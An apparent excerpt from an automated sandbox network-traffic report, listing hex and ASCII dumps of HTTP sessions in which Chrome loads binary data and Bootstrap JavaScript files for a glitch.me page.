            2024-09-29 02:32:44 UTC2864INData Raw: f5 fa b6 5b 93 4e 78 75 55 c5 42 0f 67 2d 2f e8 b7 7f 87 95 cf 88 cc 73 8a 54 ea fb 34 dc 9a dd 2e 9e ac fa 56 0f 11 47 03 e1 a6 87 72 fa c8 33 5d 5f 85 bc 5b 0c ec b8 b8 85 b6 f6 0e 0d 7c 1b 17 c5 3f 0e e9 93 ca b3 4d 14 9e 49 39 dd 01 0b f8 b3 63 24 1a f4 0f 04 7c 49 f0 45 c4 b1 c6 24 9d 73 85 dc a1 e0 dc 71 f3 36 46 3a 70 7b f0 6b c9 cd f0 b2 a7 a4 75 f4 47 4e 5d 98 d3 a9 f1 69 f3 3f 41 3c 2b e2 8b 7f b3 a7 99 32 27 19 00 9e 95 37 8c fc 7c 96 96 8c db a3 90 2a fd e0 c3 18 af 90 7c 1f e3 b8 6f f7 9d 07 c5 6d 1b 21 20 da 5e b0 b8 49 08 19 03 77 0e be c7 9e b5 a1 1f c7 d9 35 eb 85 d2 6f 51 ec f5 26 3f 70 3e e8 ee 07 ac 6d d0 fd 3a fb 57 c2 63 3d a3 67 d2 d3 a9 16 ae 8f a3 3e 19 6b 11 5c 5c 5e 5d 33 79 6d 21 ca e0 fe 15 91 f1 df c1 50 ea 7e 11 bd d4 2d 41
            Data Ascii: [NxuUBg-/sT4.VGr3]_[|?MI9c$|IE$sq6F:p{kuGN]i?A<+2'7|*|om! ^Iw5oQ&?p>m:Wc=g>k\\^]3ym!P~-A
            2024-09-29 02:32:44 UTC2864INData Raw: e5 b4 30 4b 02 0c ec 9e e6 1f b4 23 08 b6 80 e5 15 fc ed ac 3e 4d d9 51 8b f1 07 fe 09 de bf 1f 64 f0 ab fc 52 f1 62 f8 f1 74 5d 6b 51 d6 35 0b 49 f4 b3 05 8d d0 ba b4 36 d1 db 5b 45 e7 b9 b5 8a 0f 96 45 cb ca c5 c1 62 d9 39 1d a6 a7 fb 2c ea 1e 31 fd 8e 75 af 84 9e 27 f1 95 de bc da a6 93 73 a2 a6 bc d6 42 3b b5 b7 60 cb 03 4a bb d8 4b 2c 69 b0 33 e5 7c c2 a4 e1 4b 1a 25 f0 3e fa 5a de 9a ef e7 b7 65 7d 5b 2a 8f 2a af 17 2f 86 fa fa 73 3b 6d fd dd fb bb 69 ba 3c d7 54 fd b5 bc 61 e1 bf da 86 df 4d ba f0 2f 8f 6e f4 8b 8f 87 ab af cb e1 7b 2b 7d 2a 6b eb 09 d6 fa 68 e4 ba 92 61 75 e5 6d 31 22 81 1a dc b1 6d ca 02 17 dc 07 65 ad 7f c1 42 fc 22 b6 16 37 5e 1d d0 7c 65 e3 88 27 f0 d4 3e 2f be 6d 0a ce 06 fe c6 d2 e5 04 c7 35 c0 9e 68 8e e6 09 21 10 c5 e6 4a
            Data Ascii: 0K#>MQdRbt]kQ5I6[EEb9,1u'sB;`JK,i3|K%>Ze}[**/s;mi<TaM/n{+}*khaum1"meB"7^|e'>/m5h!J
            2024-09-29 02:32:44 UTC16384INData Raw: 22 99 cc 3d 91 dd 40 06 4e aa 07 18 26 bf 40 bc 51 a5 2e ab f0 4e 6f 0a 6a 17 12 5e 59 9b 35 b6 da e7 71 da bc e7 71 e4 9d dc e4 9c e7 9a f9 b7 e0 f7 82 ec 3e 18 6a 72 5e 68 9a 57 d9 6e ee 97 69 b8 92 57 b8 9c a8 3d 32 f9 c7 e1 5e 81 7b e3 0f 11 6a a6 48 c5 fe 16 e9 70 54 ae d2 9c fb f1 8f a5 7c 25 28 53 a5 17 15 77 2b 6f 6d 2f dc fa a8 e1 2a bf 7b 65 db b2 ec 7c f7 ab fc 37 d4 bc 2d e2 51 26 8f 74 b0 dd 40 e4 44 64 c3 47 27 3c ab 8f ee b0 c7 e6 2b a6 d3 bc 5b fd aa be 74 b1 49 6b 7e 06 d9 e0 61 cc 6c 38 c7 b8 e3 83 dc 56 e6 ad e0 dd 6a 19 a6 95 e4 b0 bc 92 69 01 13 bc 45 5d 17 24 91 90 70 49 ce 09 20 f4 18 c5 72 f7 5e 19 bc 8e e7 33 7d 9d 67 86 4c a3 c3 9d ce 87 aa b6 7a e3 81 f4 cd 7d 9e 13 2d c1 55 50 ab 86 ba ab 14 9b 76 b2 7b 5d 5b f5 3e 6f 11 8c c6
            Data Ascii: "=@N&@Q.Noj^Y5qq>jr^hWniW=2^{jHpT|%(Sw+om/*{e|7-Q&t@DdG'<+[tIk~al8VjiE]$pI r^3}gLz}-UPv{][>o
            2024-09-29 02:32:44 UTC16384INData Raw: ee c6 62 79 63 62 29 c6 fb 96 b5 5b e9 2e 27 66 27 ef 1a f3 5f 8e e6 4d 4f c2 fa 7e 9b 1e ed da b6 b1 69 6a c3 fb c8 1f cc 6f d1 2b ba bb ba 2c 59 ba 57 23 e2 14 1a d7 c5 0f 0a d8 8f bb 66 27 d4 25 f6 23 6c 4b 9f c4 b6 3f 1a e1 c9 e8 ce be 3e 9c 63 bb 7f 8f 4f c4 ac 7d 45 4b 0d 29 3d ac 77 d1 c2 aa cd 8c 72 69 ec b9 14 2a ec 3e 94 92 74 af ea 6c 3d 18 d2 a7 1a 50 da 29 2f b9 58 fc 2e b5 57 52 a4 aa 3e ad b1 b8 c1 a6 09 18 fa 53 c7 14 c7 50 b8 fa d7 42 89 98 84 e4 d4 65 cb 0a 92 9a e9 c7 03 9a a5 14 80 6d 14 60 fa 1a 2a ac 01 51 9e 73 f5 a7 96 c1 a0 a0 3d a8 e5 10 cc d1 9a 77 96 be 94 df 27 e7 cd 4f 28 b4 0c d1 9a 77 96 be 94 d6 5c 37 03 8a 4b 50 d0 6b 0d e2 95 57 68 a5 db fe cb 52 11 fe 4d 3e 52 45 a2 82 54 81 eb de 90 0c f6 34 72 80 dc 34 7f 32 b3 29 c1
            Data Ascii: bycb)[.'f'_MO~ijo+,YW#f'%#lK?>cO}EK)=wri*>tl=P)/X.WR>SPBem`*Qs=w'O(w\7KPkWhRM>RET4r42)
            2024-09-29 02:32:44 UTC16384INData Raw: 4e fd a4 3e 23 7c 71 95 ee 3e 18 f8 2f 4e 87 c3 aa e5 61 d7 7c 51 34 96 f0 5f 81 91 ba 28 63 fd e1 4c 8c 86 e7 23 a8 07 81 3f ed 93 6c df 11 3c 61 f0 cf e1 cc d2 3c 7a 4f 8d 35 79 67 d5 15 18 ab 5c 5b d9 c6 27 68 73 d8 31 2b 92 39 05 45 74 bf 1c 7e 3e 68 7f 08 fc 37 e2 0f 0f d8 ea 16 fa 5f 8a b4 ff 00 0a dd ea fa 3d ac 96 e5 62 91 61 86 5d 9e 59 23 cb 62 a6 2e 63 07 3b 47 4c 67 1f 61 96 65 f0 a7 42 94 e3 45 56 ad 5a ee 29 f3 38 c2 0a 4e 1c cd 46 cd b7 25 2d fd d8 a5 76 9d f4 f9 6c c3 1d 2a 95 aa c6 55 7d 95 2a 56 4d ab 29 4a 6e 2a 5c a9 ca e9 2e 57 1d b5 93 76 4d 5b 5e 4f 56 fd a4 3e 24 7c 0a d9 77 f1 33 c1 3a 6d c7 87 4b 05 9f 5b f0 b4 f2 5c 45 a7 e4 e3 74 b0 48 3c c0 9d cb 64 63 18 e4 90 2b dc bc 3f e2 0b 1f 15 e8 76 9a 96 9b 75 0d f6 9f 7d 12 cf 6f 71
            Data Ascii: N>#|q>/Na|Q4_(cL#?l<a<zO5yg\['hs1+9Et~>h7_=ba]Y#b.c;GLgaeBEVZ)8NF%-vl*U}*VM)Jn*\.WvM[^OV>$|w3:mK[\EtH<dc+?vu}oq
            2024-09-29 02:32:44 UTC968INData Raw: 5f fe 0b e4 ff 00 e3 d4 01 a9 45 65 fd 93 5b ff 00 a0 86 97 ff 00 82 f9 3f f8 f5 1f 64 d6 ff 00 e8 21 a5 ff 00 e0 be 4f fe 3d 40 1f 96 ff 00 b4 7f fc 96 9d 6b e9 6f ff 00 a4 f1 57 0f df f1 ae e3 f6 90 ff 00 92 cf ac 7d 20 ff 00 d2 78 eb 87 ef f8 d7 ec 79 3f fb 85 0f f0 47 ff 00 49 47 2e 23 f8 b2 f5 7f 99 22 ae e3 4f 51 82 bf 5a 48 fa 9a 72 a1 20 57 a2 73 c9 e8 49 9a 72 0f 96 88 fa 9a 75 06 21 48 7b d2 81 93 41 e3 3e d4 0e 32 b0 6d 07 b5 26 c1 e8 3f 2a 52 a5 68 a0 43 4c 6a 7b 50 10 2f 6a 50 99 34 a2 23 41 49 db 61 0f 23 ee 9f ca 93 6a ff 00 74 7e 55 23 26 47 e3 4d 31 31 ef 41 7c fa 8d da 3f bb fa 51 b7 fd 9f d2 a5 1c d2 85 2c 4d 03 e6 76 b9 1a 2e 4f dd e3 e9 4b e5 0f 43 4f 28 c3 d2 9d 1a 16 ff 00 eb d0 4f 33 7a 0c 03 91 f2 9f ca a4 03 1f c2 7f 2a 76 cc 62
            Data Ascii: _Ee[?d!O=@koW} xy?GIG.#"OQZHr WsIru!H{A>2m&?*RhCLj{P/jP4#AIa#jt~U#&GM11A|?Q,Mv.OKCO(O3z*vb


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            8192.168.2.649729104.18.11.2074433576C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-29 02:32:43 UTC619OUTGET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1
            Host: maxcdn.bootstrapcdn.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Origin: https://certain-jeweled-verse.glitch.me
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: */*
            Sec-Fetch-Site: cross-site
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: script
            Referer: https://certain-jeweled-verse.glitch.me/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-29 02:32:43 UTC935INHTTP/1.1 200 OK
            Date: Sun, 29 Sep 2024 02:32:43 GMT
            Content-Type: application/javascript; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            CDN-PullZone: 252412
            CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
            CDN-RequestCountryCode: US
            Vary: Accept-Encoding
            Access-Control-Allow-Origin: *
            Cache-Control: public, max-age=31919000
            ETag: W/"14d449eb8876fa55e1ef3c2cc52b0c17"
            Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT
            CDN-ProxyVer: 1.04
            CDN-RequestPullSuccess: True
            CDN-RequestPullCode: 200
            CDN-CachedAt: 09/24/2024 09:00:40
            CDN-EdgeStorageId: 1067
            timing-allow-origin: *
            cross-origin-resource-policy: cross-origin
            X-Content-Type-Options: nosniff
            CDN-Status: 200
            CDN-RequestTime: 0
            CDN-RequestId: 89606ccdb3ee743730617908767889c6
            CDN-Cache: HIT
            CF-Cache-Status: HIT
            Age: 73588
            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
            Server: cloudflare
            CF-RAY: 8ca890773e305e80-EWR
            2024-09-29 02:32:43 UTC434INData Raw: 37 62 66 61 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74
            Data Ascii: 7bfa/*! * Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t
            2024-09-29 02:32:43 UTC1369INData Raw: 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 69 2e 6b 65 79 2c 69 29 7d 7d 66 75 6e 63 74 69 6f 6e 20
            Data Ascii: .js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function
            2024-09-29 02:32:43 UTC1369INData Raw: 7d 2c 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 65 29 7d 2c 69 73 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 74 5b 30 5d 7c 7c 74 29 2e 6e 6f 64 65 54 79 70 65 7d 2c 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 6e 29 69 66 28 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 73 29 29 7b 76 61 72 20 72 3d 6e 5b 73 5d 2c 6f 3d 65 5b 73 5d 2c 61 3d 6f 26 26 69 2e 69 73 45 6c 65 6d 65 6e 74 28 6f 29 3f 22 65 6c 65 6d 65 6e 74 22 3a 28 6c 3d 6f 2c 7b 7d 2e 74 6f 53 74
            Data Ascii: },supportsTransitionEnd:function(){return Boolean(e)},isElement:function(t){return(t[0]||t).nodeType},typeCheckConfig:function(t,e,n){for(var s in n)if(Object.prototype.hasOwnProperty.call(n,s)){var r=n[s],o=e[s],a=o&&i.isElement(o)?"element":(l=o,{}.toSt
            2024-09-29 02:32:43 UTC1369INData Raw: 2e 74 72 69 67 67 65 72 28 65 29 2c 65 7d 2c 65 2e 5f 72 65 6d 6f 76 65 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 6f 28 74 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 5f 29 2c 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 6f 28 74 29 2e 68 61 73 43 6c 61 73 73 28 64 29 3f 6f 28 74 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 2c 6e 29 7d 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 31 35 30 29 3a 74 68 69 73 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 29 7d 2c 65 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65
            Data Ascii: .trigger(e),e},e._removeElement=function(t){var e=this;o(t).removeClass(_),P.supportsTransitionEnd()&&o(t).hasClass(d)?o(t).one(P.TRANSITION_END,function(n){return e._destroyElement(t,n)}).emulateTransitionEnd(150):this._destroyElement(t)},e._destroyEleme
            2024-09-29 02:32:43 UTC1369INData Raw: 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 69 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 29 72 65 74 75 72 6e 3b 69 2e 63 68 65 63 6b 65 64 3d 21 70 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 43 29 2c 70 28 69 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 7d 69 2e 66 6f 63 75 73 28 29 2c 65 3d 21 31 7d 7d 65 26 26 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 70 72 65 73 73 65 64 22 2c 21 70
            Data Ascii: .hasAttribute("disabled")||n.hasAttribute("disabled")||i.classList.contains("disabled")||n.classList.contains("disabled"))return;i.checked=!p(this._element).hasClass(C),p(i).trigger("change")}i.focus(),e=!1}}e&&this._element.setAttribute("aria-pressed",!p
            2024-09-29 02:32:43 UTC1369INData Raw: 6c 65 61 76 65 22 2b 69 2c 54 4f 55 43 48 45 4e 44 3a 22 74 6f 75 63 68 65 6e 64 22 2b 69 2c 4c 4f 41 44 5f 44 41 54 41 5f 41 50 49 3a 22 6c 6f 61 64 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 5f 3d 22 63 61 72 6f 75 73 65 6c 22 2c 67 3d 22 61 63 74 69 76 65 22 2c 70 3d 22 73 6c 69 64 65 22 2c 6d 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 72 69 67 68 74 22 2c 76 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6c 65 66 74 22 2c 45 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6e 65 78 74 22 2c 54 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 70 72 65 76 22 2c 79 3d 7b 41 43 54 49 56 45 3a 22 2e 61 63 74 69 76 65 22 2c 41 43 54 49
            Data Ascii: leave"+i,TOUCHEND:"touchend"+i,LOAD_DATA_API:"load"+i+".data-api",CLICK_DATA_API:"click"+i+".data-api"},_="carousel",g="active",p="slide",m="carousel-item-right",v="carousel-item-left",E="carousel-item-next",T="carousel-item-prev",y={ACTIVE:".active",ACTI
            2024-09-29 02:32:43 UTC1369INData Raw: 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 26 26 21 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 26 26 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 28 64 6f 63 75 6d 65 6e 74 2e 76 69 73 69 62 69 6c 69 74 79 53 74 61 74 65 3f 74 68 69 73 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3a 74 68 69 73 2e 6e 65 78 74 29 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29 29 7d 2c 43 2e 74 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3d 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 66 69 6e 64 28 79 2e 41 43 54 49 56 45 5f 49 54 45 4d 29 5b 30 5d 3b 76 61 72 20 69 3d 74 68 69 73 2e 5f
            Data Ascii: onfig.interval&&!this._isPaused&&(this._interval=setInterval((document.visibilityState?this.nextWhenVisible:this.next).bind(this),this._config.interval))},C.to=function(e){var n=this;this._activeElement=t(this._element).find(y.ACTIVE_ITEM)[0];var i=this._
            2024-09-29 02:32:43 UTC1369INData Raw: 65 74 2e 74 61 67 4e 61 6d 65 29 29 73 77 69 74 63 68 28 74 2e 77 68 69 63 68 29 7b 63 61 73 65 20 33 37 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 70 72 65 76 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 39 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 6e 65 78 74 28 29 7d 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 74 65 6d 73 3d 74 2e 6d 61 6b 65 41 72 72 61 79 28 74 28 65 29 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 79 2e 49 54 45 4d 29 29 2c 74 68 69 73 2e 5f 69 74 65 6d 73 2e 69 6e 64 65 78 4f 66 28 65 29 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 42 79 44 69 72 65 63 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e
            Data Ascii: et.tagName))switch(t.which){case 37:t.preventDefault(),this.prev();break;case 39:t.preventDefault(),this.next()}},C._getItemIndex=function(e){return this._items=t.makeArray(t(e).parent().find(y.ITEM)),this._items.indexOf(e)},C._getItemByDirection=function
            2024-09-29 02:32:43 UTC1369INData Raw: 74 69 6f 6e 3a 72 2c 66 72 6f 6d 3a 6c 2c 74 6f 3a 5f 7d 29 3b 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 70 29 3f 28 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 73 29 2c 50 2e 72 65 66 6c 6f 77 28 63 29 2c 74 28 61 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 61 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 63 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 69 2b 22 20 22 2b 73 29 2e 61 64 64 43 6c 61 73 73 28 67 29 2c 74 28 61 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 67 2b 22 20 22 2b 73 2b 22 20 22 2b 69 29 2c 6f 2e 5f 69 73 53 6c
            Data Ascii: tion:r,from:l,to:_});P.supportsTransitionEnd()&&t(this._element).hasClass(p)?(t(c).addClass(s),P.reflow(c),t(a).addClass(i),t(c).addClass(i),t(a).one(P.TRANSITION_END,function(){t(c).removeClass(i+" "+s).addClass(g),t(a).removeClass(g+" "+s+" "+i),o._isSl
            2024-09-29 02:32:43 UTC1369INData Raw: 44 45 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 28 74 68 69 73 29 3b 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 65 2c 65 2e 64 61 74 61 28 29 29 7d 29 7d 29 2c 74 2e 66 6e 5b 65 5d 3d 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 74 2e 66 6e 5b 65 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 43 2c 74 2e 66 6e 5b 65 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 66 6e 5b 65 5d 3d 6f 2c 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 43 7d 28 65 29 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 63 6f 6c 6c 61 70 73 65 22 2c 6e 3d 22 62 73 2e 63 6f 6c 6c 61 70 73 65 22 2c 69 3d 22 2e 22 2b 6e 2c 6f 3d 74 2e
            Data Ascii: DE).each(function(){var e=t(this);C._jQueryInterface.call(e,e.data())})}),t.fn[e]=C._jQueryInterface,t.fn[e].Constructor=C,t.fn[e].noConflict=function(){return t.fn[e]=o,C._jQueryInterface},C}(e),H=function(t){var e="collapse",n="bs.collapse",i="."+n,o=t.


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            9192.168.2.649731104.18.10.2074433576C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-29 02:32:43 UTC576OUTGET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1
            Host: stackpath.bootstrapcdn.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: */*
            Sec-Fetch-Site: cross-site
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: script
            Referer: https://certain-jeweled-verse.glitch.me/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-29 02:32:43 UTC918INHTTP/1.1 200 OK
            Date: Sun, 29 Sep 2024 02:32:43 GMT
            Content-Type: application/javascript; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            CDN-PullZone: 252412
            CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
            CDN-RequestCountryCode: DE
            Access-Control-Allow-Origin: *
            Cache-Control: public, max-age=31919000
            ETag: W/"67176c242e1bdc20603c878dee836df3"
            Last-Modified: Mon, 25 Jan 2021 22:04:06 GMT
            CDN-CachedAt: 10/31/2023 18:58:40
            CDN-ProxyVer: 1.04
            CDN-RequestPullCode: 200
            CDN-RequestPullSuccess: True
            CDN-EdgeStorageId: 1048
            timing-allow-origin: *
            cross-origin-resource-policy: cross-origin
            X-Content-Type-Options: nosniff
            CDN-Status: 200
            CDN-RequestId: f4f838df79fc133911a060d7c6bb0f5c
            CDN-Cache: HIT
            CF-Cache-Status: HIT
            Age: 17219492
            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
            Server: cloudflare
            CF-RAY: 8ca89077383142fc-EWR
            2024-09-29 02:32:43 UTC451INData Raw: 37 63 30 62 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 31 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28
            Data Ascii: 7c0b/*! * Bootstrap v4.1.3 (https://getbootstrap.com/) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(
